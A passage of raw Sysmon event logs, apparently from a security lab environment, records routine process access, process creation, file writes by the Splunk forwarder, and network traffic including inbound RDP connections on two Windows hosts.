M32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CE1-6151-7400-00000000FD01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.565{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE1-6151-7400-00000000FD01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.402{5EBD8912-8CE1-6151-7400-00000000FD01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:33.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D458D27F095B33942DCE7125171D118,SHA256=65648F34127A58A5A443D5909B4523CE2D667DABD13CD2519873F41ACAB1D5D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:30.794{69CF5F33-7F0C-614D-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.15win-host-542.attackrange.local137netbios-nsfalse10.0.1.14-137netbios-ns 23542300x8000000000000000980634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:33.087{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE873944BB35D9EE617FDEA406B0F47,SHA256=7DE50812A3CB6AB6F4B17EFFD1B0DF194388DB74F1F76587267598DFA969AB4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.519{5EBD8912-8CE2-6151-7500-00000000FD01}31523532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE2-6151-7500-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CE2-6151-7500-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.284{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE2-6151-7500-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.285{5EBD8912-8CE2-6151-7500-00000000FD01}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:32.367{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49170- 354300x80000000000000001054405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.992{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:f8c0:7e28:8c9e:ffff-61538-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000001054404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.992{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local61538-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000001054403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.992{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54788- 354300x80000000000000001054402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.992{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local137netbios-nsfalse10.0.1.15WIN-HOST-542137netbios-ns 354300x80000000000000001054401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.413{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x8000000000000000980639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:31.867{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65334-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:31.132{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65046-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:34.134{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77715F266F8E7FEC920EBBD65A787D2,SHA256=AA8B2A3EC55877FD21257C17A2214F3B72408B75EDE31B02D813317888649DF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE3-6151-7700-00000000FD01}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:35.878{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 